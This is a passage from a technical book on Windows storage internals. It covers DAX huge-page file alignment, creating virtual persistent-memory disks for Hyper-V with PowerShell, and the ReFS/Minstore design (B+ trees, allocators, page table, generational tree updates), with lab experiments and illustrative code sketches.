contains 0A0000D57CEA8867    contains 8A000152400008E7    contains 0000000000000000    contains 0000000000000000
pfn d57cea8 ---DA--UWEV      pfn 15240000 --LDA--UW-V     LARGE PAGE pfn 15240000      LARGE PAGE pfn 15240000
The !pte debugger command confirmed that the first 1 GB of space of the DAX file is mapped
using huge pages. Indeed, neither the page directory nor the page table are present. The FsTool
application can also be used to set the alignment of already existing files. The FSCTL_SET_DAX_
ALLOC_ALIGNMENT_HINT control code does not actually move any data though; it just provides
a hint for newly allocated file extents, as the file continues to grow in the future:
D:\>fstool e:\test.iso /align:2MB /offset:0
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Applying file alignment to "test.iso" (Offset 0x0)... Success.
Press any key to exit...
D:\>fsutil dax queryfileAlignment e:\test.iso
File Region Alignment:
Region    Alignment    StartOffset    LengthInBytes
0         Huge         0              0x100000000
1         Large        0x100000000    0xf800000
2         Other        0x10f800000    0x17b000
Virtual PM disks and Storage Spaces support
Persistent memory was specifically designed for server systems and mission-critical applications, like
huge SQL databases, which need a fast response time and process thousands of queries per second.
Often, these kinds of servers run applications in virtual machines provided by Hyper-V. Windows Server
2019 supports a new kind of virtual hard disk: virtual PM disks. Virtual PMs are backed by a VHDPMEM
file, which, at the time of this writing, can only be created (or converted from a regular VHD file) by
using Windows PowerShell. Virtual PM disks directly map chunks of space located on a real DAX disk
installed in the host, via a VHDPMEM file, which must reside on that DAX volume.
When attached to a virtual machine, Hyper-V exposes a virtual PM device (VPMEM) to the guest. This
virtual PM device is described by the NVDIMM Firmware interface table (NFIT) located in the virtual
UEFI BIOS. (More details about the NFIT table are available in the ACPI 6.2 specification.) The SCM Bus
driver reads the table and creates the regular device objects representing the virtual NVDIMM device
and the PM disk. The Pmem disk class driver manages the virtual PM disks in the same way as normal
PM disks, and creates virtual volumes on the top of them. Details about the Windows Hypervisor and
its components can be found in Chapter 9. Figure 11-77 shows the PM stack for a virtual machine that
uses a virtual PM device. The dark gray components are parts of the virtualized stack, whereas light
gray components are the same in both the guest and the host partition.
FIGURE 11-77 The virtual PM architecture. (On the host, the PMEM driver stack and NTFS in DAX mode expose a VHDPMEM file backed by a persistent region of an NVDIMM. The worker process's VPMEM VDEV opens the VHDPMEM file and, together with the VID and the BIOS VDEV, provides the guest an ACPI NFIT describing the NVDIMM layout of the virtual PMEM device, which the guest PMEM driver stack and a PMEM-aware file system then consume.)
A virtual PM device exposes a contiguous address space, virtualized from the host (this means that
the host VHDPMEM files don’t need to be contiguous). It supports both DAX and block mode,
which, as in the host case, must be decided at volume-format time, and supports large and huge pages,
which are leveraged in the same way as on the host system. Only generation 2 virtual machines support
virtual PM devices and the mapping of VHDPMEM files.
Storage Spaces Direct in Windows Server 2019 also supports DAX disks in its virtual storage pools. One
or more DAX disks can be part of an aggregated array of mixed-type disks. The PM disks in the array can
be configured to provide the capacity or performance tier of a bigger tiered virtual disk or can be config-
ured to act as a high-performance cache. More details on Storage Spaces are available later in this chapter.
EXPERIMENT: Create and mount a VHDPMEM image
As discussed in the previous paragraph, virtual PM disks can be created, converted, and assigned
to a Hyper-V virtual machine using PowerShell. In this experiment, you need a DAX disk and a
generation 2 virtual machine with Windows 10 October Update (RS5, or later releases) installed
(describing how to create a VM is outside the scope of this experiment). Open an administrative
Windows PowerShell prompt, move to your DAX-mode disk, and create the virtual PM disk (in
the example, the DAX disk is located in the Q: drive):
PS Q:\> New-VHD VmPmemDis.vhdpmem -Fixed -SizeBytes 256GB -PhysicalSectorSizeBytes 4096
ComputerName            : 37-4611k2635
Path                    : Q:\VmPmemDis.vhdpmem
VhdFormat               : VHDX
VhdType                 : Fixed
FileSize                : 274882101248
Size                    : 274877906944
MinimumSize             :
LogicalSectorSize       : 4096
PhysicalSectorSize      : 4096
BlockSize               : 0
ParentPath              :
DiskIdentifier          : 3AA0017F-03AF-4948-80BE-B40B4AA6BE24
FragmentationPercentage : 0
Alignment               : 1
Attached                : False
DiskNumber              :
IsPMEMCompatible        : True
AddressAbstractionType  : None
Number                  :
Virtual PM disks can be of fixed size only, meaning that all the space is allocated for the virtual
disk—this is by design. The second step requires you to create the virtual PM controller and at-
tach it to your virtual machine. Make sure that your VM is switched off, and type the following
command (you should replace "TestPmVm" with the name of your virtual machine):
PS Q:\> Add-VMPmemController -VMName "TestPmVm"
Finally, you need to attach the created virtual PM disk to the virtual machine’s PM controller:
PS Q:\> Add-VMHardDiskDrive "TestPmVm" PMEM -ControllerLocation 1 -Path 'Q:\VmPmemDis.vhdpmem'
You can verify the result of the operation by using the Get-VMPmemController command:
PS Q:\> Get-VMPmemController -VMName "TestPmVm"
VMName ControllerNumber Drives
------ ---------------- ------
TestPmVm 0                {Persistent Memory Device on PMEM controller number 0 at location 1}
If you switch on your virtual machine, you will find that Windows detects a new virtual disk. In
the virtual machine, open the Disk Management MMC snap-in Tool (diskmgmt.msc) and initialize
the disk using GPT partitioning. Then create a simple volume, assign a drive letter to it, but don’t
format it.
You need to format the virtual PM disk in DAX mode. Open an administrative command
prompt window in the virtual machine. Assuming that your virtual-pm disk drive letter is E:, you
need to use the following command:
C:\>format e: /DAX /fs:NTFS /q
The type of the file system is RAW.
The new file system is NTFS.
WARNING, ALL DATA ON NON-REMOVABLE DISK
DRIVE E: WILL BE LOST!
Proceed with Format (Y/N)? y
QuickFormatting 256.0 GB
Volume label (32 characters, ENTER for none)? DAX-In-Vm
Creating file system structures.
Format complete.
256.0 GB total disk space.
255.9 GB are available.
You can then confirm that the virtual disk has been formatted in DAX mode by using the
fsutil.exe built-in tool, specifying the fsinfo volumeinfo command-line arguments:
C:\>fsutil fsinfo volumeinfo E:
Volume Name : DAX-In-Vm
Volume Serial Number : 0x1a1bdc32
Max Component Length : 255
File System Name : NTFS
Is ReadWrite
Not Thinly-Provisioned
Supports Case-sensitive filenames
Preserves Case of filenames
Supports Unicode in filenames
Preserves & Enforces ACL’s
Supports Disk Quotas
Supports Reparse Points
Returns Handle Close Result Information
Supports POSIX-style Unlink and Rename
Supports Object Identifiers
Supports Named Streams
Supports Hard Links
Supports Extended Attributes
Supports Open By FileID
Supports USN Journal
Is DAX Volume
Resilient File System (ReFS)
The release of Windows Server 2012 R2 saw the introduction of a new advanced file system, the
Resilient File System (also known as ReFS). This file system is part of a new storage architecture, called
Storage Spaces, which, among other features, allows the creation of a tiered virtual volume composed
of a solid-state drive and a classical rotational disk. (An introduction to Storage Spaces and tiered
storage is presented later in this chapter.) ReFS is a “write-to-new” file system, which means that file
system metadata is never updated in place; updated metadata is written in a new place, and the old
one is marked as deleted. This property is important and is one of the features that provides data
integrity. The original goals of ReFS were the following:
1. Self-healing, online volume check and repair (providing close to zero unavailability due to file system corruption) and write-through support. (Write-through is discussed later in this section.)

2. Data integrity for all user data (hardware and software).

3. Efficient and fast file snapshots (block cloning).

4. Support for extremely large volumes (exabyte sizes) and files.

5. Automatic tiering of data and metadata, support for SMR (shingled magnetic recording) and future solid-state disks.
There have been different versions of ReFS. The one described in this book is referred to as ReFS v2, which was first implemented in Windows Server 2016. Figure 11-78 shows an overview of the high-level implementation differences between NTFS and ReFS. Instead of completely rewriting the NTFS file system, ReFS uses another approach, dividing the implementation of NTFS into two parts: one part understands the on-disk format, and the other does not.
FIGURE 11-78 ReFS high-level implementation compared to NTFS.
ReFS replaces the on-disk storage engine with Minstore. Minstore is a recoverable object store library that provides a key-value table interface to its callers, implements allocate-on-write semantics for
modification to those tables, and integrates with the Windows cache manager. Essentially, Minstore is a
library that implements the core of a modern, scalable copy-on-write file system. Minstore is leveraged
by ReFS to implement files, directories, and so on. Understanding the basics of Minstore is needed to
describe ReFS, so let’s start with a description of Minstore.
Minstore architecture
Everything in Minstore is a table. A table is composed of multiple rows, each made of a key-value pair. Minstore tables, when stored on disk, are represented using B+ trees. When kept in volatile memory (RAM), they are represented using hash tables. B+ trees, also known as balanced trees, have several important properties:

1. They usually have a large number of children per node.

2. They store data pointers (a pointer to the disk file block that contains the key value) only on the leaves—not on internal nodes.

3. Every path from the root node to a leaf node is of the same length.
Other file systems (like NTFS) generally use B-trees (another data structure that generalizes a binary search tree, not to be confused with the term “binary tree”) to store the data pointer, along with the key, in each node of the tree. This technique greatly reduces the number of entries that can be packed into a node of a B-tree, thereby increasing the number of levels in the tree and hence the search time for a record.
Figure 11-79 shows an example of a B+ tree. In the tree shown in the figure, the root and the internal node contain only keys, which are used for properly accessing the data located in the leaf nodes. Leaf nodes are all at the same level and are generally linked together. As a consequence, there is no need to emit lots of I/O operations for finding an element in the tree.
For example, let’s assume that Minstore needs to access the node with the key 20. The root node contains one key used as an index. Keys with a value greater than or equal to 13 are stored in one of the children indexed by the right pointer; meanwhile, keys with a value less than 13 are stored in one of the left children. When Minstore has reached the leaf, which contains the actual data, it can easily access the data also for the nodes with keys 16 and 25 without performing any full tree scan.
Furthermore, the leaf nodes are usually linked together using linked lists. This means that for huge trees, Minstore can, for example, query all the files in a folder by accessing the root and the intermediate nodes only once—assuming that in the figure all the files are represented by the values stored in the leaves. As mentioned above, Minstore generally uses a B+ tree for representing various objects other than files or directories.
FIGURE 11-79 A sample B+ tree. Only the leaf nodes contain data pointers. Director nodes contain only links to children nodes.
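The lookup just described can be sketched in a few lines. This is an illustrative model only—the class and function names are invented, not Minstore’s actual interfaces: director nodes hold keys and child links, while leaves hold the rows and are chained together.

```python
# Illustrative sketch only: names are invented, not Minstore's real
# interfaces. Director nodes hold keys and child links; leaf nodes hold
# the rows and are chained together, as in Figure 11-79.

class Leaf:
    def __init__(self, rows):
        self.rows = dict(rows)   # key -> row data
        self.next = None         # leaves are linked for cheap scans

class Director:
    def __init__(self, keys, children):
        self.keys = keys         # separator keys only, no data pointers
        self.children = children # len(children) == len(keys) + 1

def lookup(node, key):
    # Walk director nodes down to the leaf level; every root-to-leaf
    # path in a B+ tree has the same length.
    while isinstance(node, Director):
        i = 0
        while i < len(node.keys) and key >= node.keys[i]:
            i += 1
        node = node.children[i]
    return node.rows.get(key)

def scan_all(leftmost_leaf):
    # Enumerate every row by following the leaf chain; the directors
    # are touched only once, on the way down to the first leaf.
    leaf = leftmost_leaf
    while leaf is not None:
        yield from sorted(leaf.rows.items())
        leaf = leaf.next

leaves = [Leaf({1: 'a', 4: 'b'}), Leaf({9: 'c', 10: 'd'}),
          Leaf({11: 'e', 12: 'f'}), Leaf({13: 'g', 15: 'h'}),
          Leaf({16: 'i', 20: 'j', 25: 'k'})]
for left, right in zip(leaves, leaves[1:]):
    left.next = right
root = Director([13], [Director([9, 11], leaves[:3]),
                       Director([16], leaves[3:])])
```

Because the leaves are chained, scan_all touches the director nodes only during the initial descent; every further row comes from following leaf links, which is what makes full enumerations cheap.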
In this book, we use the terms B+ tree and B+ table to express the same concept. Minstore defines different kinds of tables. A table can be created, and it can have rows added to it, deleted from it, or updated inside of it. An external entity can enumerate the table or find a single row. The Minstore core is represented by the object table. The object table is an index of the location of every root (nonembedded) B+ tree in the volume. B+ trees can be embedded within other trees; a child tree’s root is stored within the row of a parent tree.
Each table in Minstore is defined by a composite and a schema. A composite is just a set of rules that describe the behavior of the root node (sometimes even the children) and how to find and manipulate each node of the B+ table. Minstore supports two kinds of root nodes, managed by their respective composites:
■ Copy on Write (CoW): This kind of root node moves its location when the tree is modified. This means that in case of modification, a brand-new B+ tree is written while the old one is marked for deletion. In order to deal with these nodes, the corresponding composite needs to maintain an object ID that will be used when the table is written.

■ Embedded: This kind of root node is stored in the data portion (the value of a leaf node) of an index entry of another B+ tree. The embedded composite maintains a reference to the index entry that stores the embedded root node.
Specifying a schema when the table is created tells Minstore what type of key is being used, how big
the root and the leaf nodes of the table should be, and how the rows in the table are laid out. ReFS uses
different schemas for files and directories. Directories are B+ table objects referenced by the object
table, which can contain three different kinds of rows (files, links, and file IDs). In ReFS, the key of each
row represents the name of the file, link, or file ID. Files are tables that contain attributes in their rows
(attribute code and value pairs).
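As a rough illustration of this model—the attribute codes and row shapes below are assumptions made for the sketch, not real on-disk values—a directory can be viewed as a table keyed by entry name whose rows are files, links, or file IDs, while a file is itself a table keyed by attribute code:

```python
# Rough illustration only: attribute codes and row shapes are assumed
# for this sketch, not real on-disk values. A directory is a table
# keyed by entry name; a file is a table keyed by attribute code.

ATTR_STD_INFO, ATTR_FILE_NAME, ATTR_EXTENTS = 0x10, 0x30, 0x80

def make_file(name):
    # A file's rows are (attribute code, value) pairs.
    return {ATTR_STD_INFO: {'size': 0},
            ATTR_FILE_NAME: name,
            ATTR_EXTENTS: {}}

directory = {
    'a.txt': ('file', make_file('a.txt')),      # embedded file table
    'subdir': ('link', 'object-id-of-subdir'),  # link to a directory
    'by-id': ('fileid', 0x2A),                  # file-ID row
}

def enumerate_rows(table):
    # An external entity can enumerate the table or find a single row.
    return [(name, kind) for name, (kind, _) in sorted(table.items())]
```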
Every operation that can be performed on a table (close, modify, write to disk, or delete) is repre-
sented by a Minstore transaction. A Minstore transaction is similar to a database transaction: a unit of
work, sometimes made up of multiple operations, that can succeed or fail only in an atomic way. The
way in which tables are written to the disk is through a process known as updating the tree. When a tree
update is requested, transactions are drained from the tree, and no transactions are allowed to start
until the update is finished.
One important concept used in ReFS is the embedded table: a B+ tree that has the root node located
in a row of another B+ tree. ReFS uses embedded tables extensively. For example, every file is a B+ tree
whose roots are embedded in the row of directories. Embedded tables also support a move operation
that changes the parent table. The size of the root node is fixed and is taken from the table’s schema.
B+ tree physical layout
In Minstore, a B+ tree is made of buckets. Buckets are the Minstore equivalent of the general B+ tree
nodes. Leaf buckets contain the data that the tree is storing; intermediate buckets are called director nodes
and are used only for direct lookups to the next level in the tree. (In Figure 11-79, each node is a bucket.)
Because director nodes are used only for directing traffic to child buckets, they need not have exact
copies of a key in a child bucket but can instead pick a value between two buckets and use that. (In
ReFS, usually the key is a compressed file name.) The data of an intermediate bucket instead contains both the logical cluster number (LCN) and a checksum of the bucket that it’s pointing to. (The checksum allows ReFS to implement self-healing features.) The intermediate nodes of a Minstore table could
be considered as a Merkle tree, in which every leaf node is labelled with the hash of a data block, and
every nonleaf node is labelled with the cryptographic hash of the labels of its child nodes.
Every bucket is composed of an index header that describes the bucket, and a footer, which is an array
of offsets pointing to the index entries in the correct order. Between the header and the footer there are
the index entries. An index entry represents a row in the B+ table; a row is a simple data structure that
gives the location and size of both the key and data (which both reside in the same bucket). Figure 11-80
shows an example of a leaf bucket containing three rows, indexed by the offsets located in the footer. In
leaf pages, each row contains the key and the actual data (or the root node of another embedded tree).
FIGURE 11-80 A leaf bucket with three index entries that are ordered by the array of offsets in the footer.
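A toy serialization along the lines of Figure 11-80 might look as follows. The field sizes and header layout are invented for illustration; only the general shape—header, index entries, and a footer of key-ordered offsets—follows the description above.

```python
# Toy serialization: field sizes and header layout are invented; only
# the general shape (header, index entries, footer of key-ordered
# offsets) follows the bucket description above.
import struct

def build_bucket(rows):
    # rows: list of (key, data) byte pairs in *insertion* order.
    body, offsets = b'', []
    base = 8                                   # rows start after header
    for key, data in rows:
        offsets.append((key, base + len(body)))
        body += struct.pack('<HH', len(key), len(data)) + key + data
    header = struct.pack('<II', len(rows), 0)  # row count, flags
    footer = b''.join(struct.pack('<I', off)   # offsets sorted by key
                      for _, off in sorted(offsets))
    return header + body + footer

def read_rows(bucket):
    nrows, _flags = struct.unpack_from('<II', bucket, 0)
    rows = []
    for i in range(nrows):
        # The i-th footer slot gives the offset of the i-th row in key order.
        off, = struct.unpack_from('<I', bucket, len(bucket) - 4 * (nrows - i))
        klen, dlen = struct.unpack_from('<HH', bucket, off)
        key = bucket[off + 4:off + 4 + klen]
        rows.append((key, bucket[off + 4 + klen:off + 4 + klen + dlen]))
    return rows   # returned in key order, regardless of insertion order

bucket = build_bucket([(b'row-b', b'2'), (b'row-a', b'1'), (b'row-c', b'3')])
```

Note how the rows themselves stay where they were written; only the small footer array encodes the key ordering, which keeps inserts cheap.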
Allocators
When the file system asks Minstore to allocate a bucket (the B+ table requests a bucket with a process called pinning the bucket), the latter needs a way to keep track of the free space of the underlying medium. The first version of Minstore used a hierarchical allocator, which meant that there were multiple
allocator objects, each of which allocated space out of its parent allocator. The root allocator mapped the entire space of the volume, and each allocator was a B+ tree that used the lcn-count table schema. This schema describes the row’s key as a range of LCNs that the allocator has taken from its parent node, and the row’s value as an allocator region. In the original implementation, an allocator region
described the state of each chunk in the region in relation to its children nodes: free or allocated and
the owner ID of the object that owns it.
Figure 11-81 shows a simplified version of the original implementation of the hierarchical allocator.
In the picture, a large allocator has only one allocation unit set: the space represented by the bit has
been allocated for the medium allocator, which is currently empty. In this case, the medium allocator
is a child of the large allocator.
FIGURE 11-81 The old hierarchical allocator.
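The hierarchical scheme of Figure 11-81 can be modeled with a small class. The chunk sizes, owner IDs, and first-fit policy below are assumptions made purely for the sketch:

```python
# Toy model of the original hierarchical allocator: each allocator's
# row key is an LCN range taken from its parent, and its value tracks
# each chunk's state (free/allocated) plus the owner. Chunk sizes,
# owner IDs, and the first-fit policy are assumptions for the sketch.

class Allocator:
    def __init__(self, start, count, chunk):
        self.chunk = chunk                      # clusters per bit
        self.key = (start, start + count - 1)   # LCN range from parent
        self.bitmap = [0] * (count // chunk)    # 0 = free, 1 = allocated
        self.owner = [None] * len(self.bitmap)

    def allocate(self, owner_id):
        # First-fit: hand the first free chunk to the requesting owner.
        for i, bit in enumerate(self.bitmap):
            if bit == 0:
                self.bitmap[i] = 1
                self.owner[i] = owner_id
                return self.key[0] + i * self.chunk
        raise RuntimeError('allocator exhausted')

# As in Figure 11-81: the large allocator spans the volume and has one
# unit allocated, which backs the (still empty) medium allocator.
large = Allocator(start=0, count=0x400000, chunk=0x10000)
medium_lcn = large.allocate(owner_id='medium-allocator')
medium = Allocator(start=medium_lcn, count=0x10000, chunk=0x1000)
```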
B+ tables deeply rely on allocators to get new buckets and to find space for the copy-on-write copies of existing buckets (implementing the write-to-new strategy). The latest Minstore version replaced the hierarchical allocator with a policy-driven allocator, with the goal of supporting a central location in the file system that would be able to support tiering. A tier is a type of the storage device—for
example, an SSD, NVMe, or classical rotational disk. Tiering is discussed later in this chapter. It is basically the ability to support a disk composed of a fast random-access zone, which is usually smaller than the slow sequential-only area.
The new policy-driven allocator is an optimized version (supporting a very large number of allocations
per second) that defines different allocation areas based on the requested tier (the type of underlying
storage device). When the file system requests space for new data, the central allocator decides which
area to allocate from by a policy-driven engine. This policy engine is tiering-aware (this means that
metadata is always written to the performance tiers and never to SMR capacity tiers, due to the random-
write nature of the metadata), supports ReFS bands, and implements deferred allocation logic (DAL). The
deferred allocation logic relies on the fact that when the file system creates a file, it usually also allocates
the needed space for the file content. Minstore, instead of returning to the underlying file system an
LCN range, returns a token containing the space reservation that provides a guarantee against the disk
becoming full. When the file is ultimately written, the allocator assigns LCNs for the file’s content and
updates the metadata. This solves problems with SMR disks (which are covered later in this chapter) and
allows ReFS to be able to create even huge files (64 TB or more) in less than a second.
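The deferred allocation logic can be sketched as a reservation that is converted into real LCNs only at write time. The method names and token shape here are hypothetical, chosen only to illustrate the idea:

```python
# Sketch of the deferred allocation logic (DAL): file creation gets a
# reservation token rather than real LCNs; clusters are assigned only
# when the data is written. Method names and token shape are invented.

class Volume:
    def __init__(self, free_clusters):
        self.free = free_clusters
        self.reserved = 0
        self.next_lcn = 0

    def reserve(self, clusters):
        # Guarantee against the disk becoming full, without choosing LCNs.
        if clusters > self.free - self.reserved:
            raise OSError('disk full')
        self.reserved += clusters
        return {'clusters': clusters}           # the reservation token

    def commit(self, token, clusters_written):
        # At write time, assign LCNs and release the reservation.
        start = self.next_lcn
        self.next_lcn += clusters_written
        self.free -= clusters_written
        self.reserved -= token['clusters']
        return (start, clusters_written)        # the extent finally used

vol = Volume(free_clusters=1000)
token = vol.reserve(600)         # "create" a huge file instantly
extent = vol.commit(token, 600)  # LCNs are assigned only on the write
```

Because reserve only checks and accounts for space, “creating” even a huge file is effectively instantaneous; the expensive LCN assignment is deferred to commit.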
The policy-driven allocator is composed of three central allocators, implemented on-disk as global
B+ tables. When they’re loaded in memory, though, the allocators are represented using AVL trees. An
AVL tree is another kind of self-balancing binary tree that’s not covered in this book. Although each
row in the B+ table is still indexed by a range, the data part of the row could contain a bitmap or, as
an optimization, only the number of allocated clusters (in case the allocated space is contiguous). The
three allocators are used for different purposes:
■ The Medium Allocator (MAA) is the allocator for each file in the namespace, except for some B+ tables allocated from the other allocators. The Medium Allocator is a B+ table itself, so it needs to find space for its metadata updates (which still follow the write-to-new strategy). This is the role of the Small Allocator (SAA).

■ The Small Allocator (SAA) allocates space for itself, for the Medium Allocator, and for two tables: the Integrity State table (which allows ReFS to support Integrity Streams) and the Block Reference Counter table (which allows ReFS to support a file’s block cloning).

■ The Container Allocator (CAA) is used when allocating space for the container table, a fundamental table that provides cluster virtualization to ReFS and is also deeply used for container compaction. (See the following sections for more details.) Furthermore, the Container Allocator contains one or more entries for describing the space used by itself.
When the Format tool initially creates the basic data structures for ReFS, it creates the three allocators. The Medium Allocator initially describes all the volume’s clusters. Space for the SAA and CAA
metadata (which are B+ tables) is allocated from the MAA (this is the only time that ever happens in
the volume lifetime). An entry for describing the space used by the Medium Allocator is inserted in the
SAA. Once the allocators are created, additional entries for the SAA and CAA are no longer allocated
from the Medium Allocator (except in case ReFS finds corruption in the allocators themselves).
To perform a write-to-new operation for a file, ReFS must first consult the MAA allocator to find space for the write to go to. In a tiered configuration, it does so with awareness of the tiers. Upon successful completion, it updates the file’s stream extent table to reflect the new location of that extent
and updates the file’s metadata. The new B+ tree is then written to the disk in the free space block,
and the old table is converted to free space. If the write is tagged as a write-through, meaning that the write must be discoverable after a crash, ReFS writes a log record for recording the write-to-new operation. (See the “ReFS write-through” section later in this chapter for further details.)
Page table
When Minstore updates a bucket in the B+ tree (maybe because it needs to move a child node or even
add a row in the table), it generally needs to update the parent (or director) nodes. (More precisely,
Minstore uses different links that point to a new and an old child bucket for every node.) This is because,
as we have described earlier, every director node contains the checksum of its leaves. Furthermore, the
leaf node could have been moved or could even have been deleted. This leads to synchronization problems; for example, imagine a thread that is reading the B+ tree while a row is being deleted. Locking the
tree and writing every modification on the physical medium would be prohibitively expensive. Minstore
needs a convenient and fast way to keep track of the information about the tree. The Minstore Page Table (unrelated to the CPU’s page table) is an in-memory hash table private to each Minstore root table—
usually the directory and file table—which keeps track of which bucket is dirty, freed, or deleted. This
table will never be stored on the disk. In Minstore, the terms bucket and page are used interchangeably;
a page usually resides in memory, whereas a bucket is stored on disk, but they express exactly the same
high-level concept. Trees and tables also are used interchangeably, which explains why the page table is
called as it is. The rows of a page table are composed of the LCN of the target bucket as the key and, as the value, a data structure that keeps track of the page states and assists the synchronization of the B+ tree.
When a page is first read or created, a new entry will be inserted into the hash table that represents
the page table. An entry into the page table can be deleted only if all the following conditions are met:
■ There are no active transactions accessing the page.

■ The page is clean and has no modifications.

■ The page is not a copy-on-write new page of a previous one.
Thanks to these rules, clean pages usually come into the page table and are deleted from it repeatedly, whereas a page that is dirty would stay in the page table until the B+ tree is updated and finally
written to disk. The process of writing the tree to stable media depends heavily upon the state in the
page table at any given time. As you can see from Figure 11-82, the page table is used by Minstore as
an in-memory cache, producing an implicit state machine that describes each state of a page.
FIGURE 11-82 The diagram shows the states of a dirty page (bucket) in the page table. A new page is produced due to copy-on-write of an old page or if the B+ tree is growing and needs more space for storing the bucket.
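The eviction rules and the state transitions of Figure 11-82 can be condensed into a small model. The field and method names are invented for this sketch:

```python
# Illustrative model of a page-table entry and its states, following
# Figure 11-82 and the three deletion conditions listed above. Field
# and method names are invented for the sketch.

CLEAN, DIRTY, COPIED, FREED = 'clean', 'dirty', 'copied', 'freed'

class PageEntry:
    """One row of the page table: keyed by the bucket's LCN."""
    def __init__(self, lcn):
        self.lcn = lcn
        self.state = CLEAN
        self.active_transactions = 0
        self.cow_of = None   # set if this page copy-on-writes another

    def modify(self):
        self.state = DIRTY

    def tree_written(self):
        # After the B+ tree is written to disk, dirty/copied pages
        # become clean again and may leave the page table.
        if self.state in (DIRTY, COPIED):
            self.state = CLEAN

    def can_evict(self):
        # The three deletion conditions listed above.
        return (self.active_transactions == 0
                and self.state == CLEAN
                and self.cow_of is None)

page = PageEntry(lcn=0x5004)
page.modify()   # the bucket is modified: the entry must stay resident
```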
Minstore I/O
In Minstore, reads and writes to the B+ tree on the final physical medium are performed in different ways: tree reads usually happen in portions, meaning that a read operation might include only some leaf buckets, for example, and occurs as part of transactional access or as a preemptive prefetch action.
After a bucket is read into the cache (see the “Cache manager” section earlier in this chapter), Minstore
still can’t interpret its data because the bucket checksum needs to be verified. The expected checksum
is stored in the parent node: when the ReFS driver (which resides above Minstore) intercepts the read
data, it knows that the node still needs to be validated: the parent node is already in the cache (the tree
has been already navigated for reaching the child) and contains the checksum of the child. Minstore
has all the needed information for verifying that the bucket contains valid data. Note that there could be pages in the page table that have never been accessed; this is because their checksum still needs to be validated.
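The parent-stored checksum check can be sketched as follows. CRC-32 is used here purely as a stand-in for whatever checksum ReFS actually computes, and the link structure is invented:

```python
# Sketch of the validation step: the expected checksum of a child
# bucket lives in its parent's link, so a freshly read bucket can be
# verified before its rows are interpreted. CRC-32 stands in for
# whatever checksum ReFS really computes; the structures are invented.
import zlib

def link_child(parent, slot, lcn, payload):
    # The parent's link records both the location and the checksum.
    parent[slot] = {'lcn': lcn, 'checksum': zlib.crc32(payload)}
    return payload                    # pretend these bytes went to disk

def read_child(parent, slot, raw_from_disk):
    expected = parent[slot]['checksum']
    if zlib.crc32(raw_from_disk) != expected:
        raise IOError('bucket corrupt: trigger self-healing')
    return raw_from_disk              # only now safe to interpret

parent_node = {}
on_disk = link_child(parent_node, 'child0', 0x9550, b'leaf-bucket-bytes')
verified = read_child(parent_node, 'child0', on_disk)
```

Because the parent is already cached by the time the child is read (the tree was navigated to reach it), the expected checksum is available without extra I/O.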
Minstore performs tree updates by writing the entire B+ tree as a single transaction. The tree update
process writes dirty pages of the B+ tree to the physical disk. There are multiple reasons behind a tree
update—an application explicitly flushing its changes, the system running in low memory or similar
conditions, the cache manager flushing cached data to disk, and so on. It’s worth mentioning that
Minstore usually writes the new updated trees lazily with the lazy writer thread. As seen in the previous
section, there are several triggers to kick in the lazy writer (for example, when the number of the dirty
pages reaches a certain threshold).
Minstore is unaware of the actual reason behind the tree update request. The first thing that Minstore
does is make sure that no other transactions are modifying the tree (using complex synchronization
primitives). After initial synchronization, it starts to write dirty pages and to deal with old deleted pages. In a
write-to-new implementation, a new page represents a bucket that has been modified and its content
replaced; a freed page is an old page that needs to be unlinked from the parent. If a transaction wants to
modify a leaf node, it copies (in memory) the root bucket and the leaf page; Minstore then creates the
corresponding page table entries in the page table without modifying any link.
The tree update algorithm enumerates each page in the page table. However, the page table has no concept of which level of the B+ tree a page resides on, so the algorithm walks the B+ tree itself, starting from the outermost nodes (usually the leaves) up to the root node. For each page, the algorithm performs the following steps:
1. Checks the state of the page. If it’s a freed page, it skips the page. If it’s a dirty page, it updates its parent pointer and checksum and puts the page in an internal list of pages to write.

2. Discards the old page.
When the algorithm reaches the root node, it updates its parent pointer and checksum directly in the object table and finally also puts the root bucket in the list of pages to write. Minstore is now able to write the new tree in the free space of the underlying volume, preserving the old tree in its original location. The old tree is only marked as freed but is still present in the physical medium. This is an important
characteristic that summarizes the write-to-new strategy and allows the ReFS file system (which resides
above Minstore) to support advanced online recovery features. Figure 11-83 shows an example of the tree
update process for a B+ table that contains two new leaf pages (A’ and B’). In the figure, pages located in
the page table are represented in a lighter shade, whereas the old pages are shown in a darker shade.
FIGURE 11-83 Minstore tree update process.
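A condensed, schematic reconstruction of the walk above (not the real algorithm): pages are visited from the leaves toward the root, freed pages are skipped, dirty pages refresh the parent’s link checksum and join the write list, and the new root lands in the object table.

```python
# Schematic reconstruction only, not the real algorithm. Pages are
# visited leaf-to-root; freed pages are skipped; dirty pages update
# the parent's link checksum (dirtying the parent in turn) and join
# the write list; the new root is recorded in the object table.
import zlib

def tree_update(pages_leaf_to_root, object_table, tree_id):
    write_list = []
    for page in pages_leaf_to_root:
        if page['state'] == 'freed':
            continue                   # old page: simply discarded
        if page['state'] == 'dirty':
            parent = page['parent']
            if parent is not None:
                parent['child_checksum'] = zlib.crc32(page['data'])
                parent['state'] = 'dirty'      # its link just changed
            write_list.append(page)
    root = pages_leaf_to_root[-1]
    object_table[tree_id] = {'checksum': zlib.crc32(root['data'])}
    return write_list        # written to free space; old pages remain

root = {'state': 'clean', 'data': b'root', 'parent': None}
new_leaf = {'state': 'dirty', 'data': b"A'", 'parent': root}
old_leaf = {'state': 'freed', 'data': b'A', 'parent': root}
object_table = {}
out = tree_update([new_leaf, old_leaf, root], object_table, tree_id=1)
```

Note how dirtying the leaf propagates upward: updating the leaf’s checksum dirties the root, so by the time the walk reaches the root it, too, is on the write list—which is exactly why the whole path to the root is rewritten in a write-to-new design.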
Maintaining exclusive access to the tree while performing the tree update can represent a performance issue; no one else can read or write from a B+ tree that has been exclusively locked. In the latest
versions of Windows 10, B+ trees in Minstore became generational—a generation number is attached
to each B+ tree. This means that a page in the tree can be dirty with regard to a specific generation. If
a page is originally dirty for only a specific tree generation, it can be directly updated, with no need to
copy-on-write because the final tree has still not been written to disk.
In the new model, the tree update process is usually split in two phases:
■ Failable phase: Minstore acquires the exclusive lock on the tree, increments the tree’s generation number, calculates and allocates the needed memory for the tree update, and finally drops the lock to shared.

■ Nonfailable phase: This phase is executed with a shared lock (meaning that other I/O can read from the tree). Minstore updates the links of the director nodes and all the tree’s checksums, and finally writes the final tree to the underlying disk. If another transaction wants to modify the tree while it’s being written to disk, it detects that the tree’s generation number is higher, so it copy-on-writes the tree again.
With the new schema, Minstore holds the exclusive lock only in the failable phase. This means that
tree updates can run in parallel with other Minstore transactions, significantly improving the overall
performance.
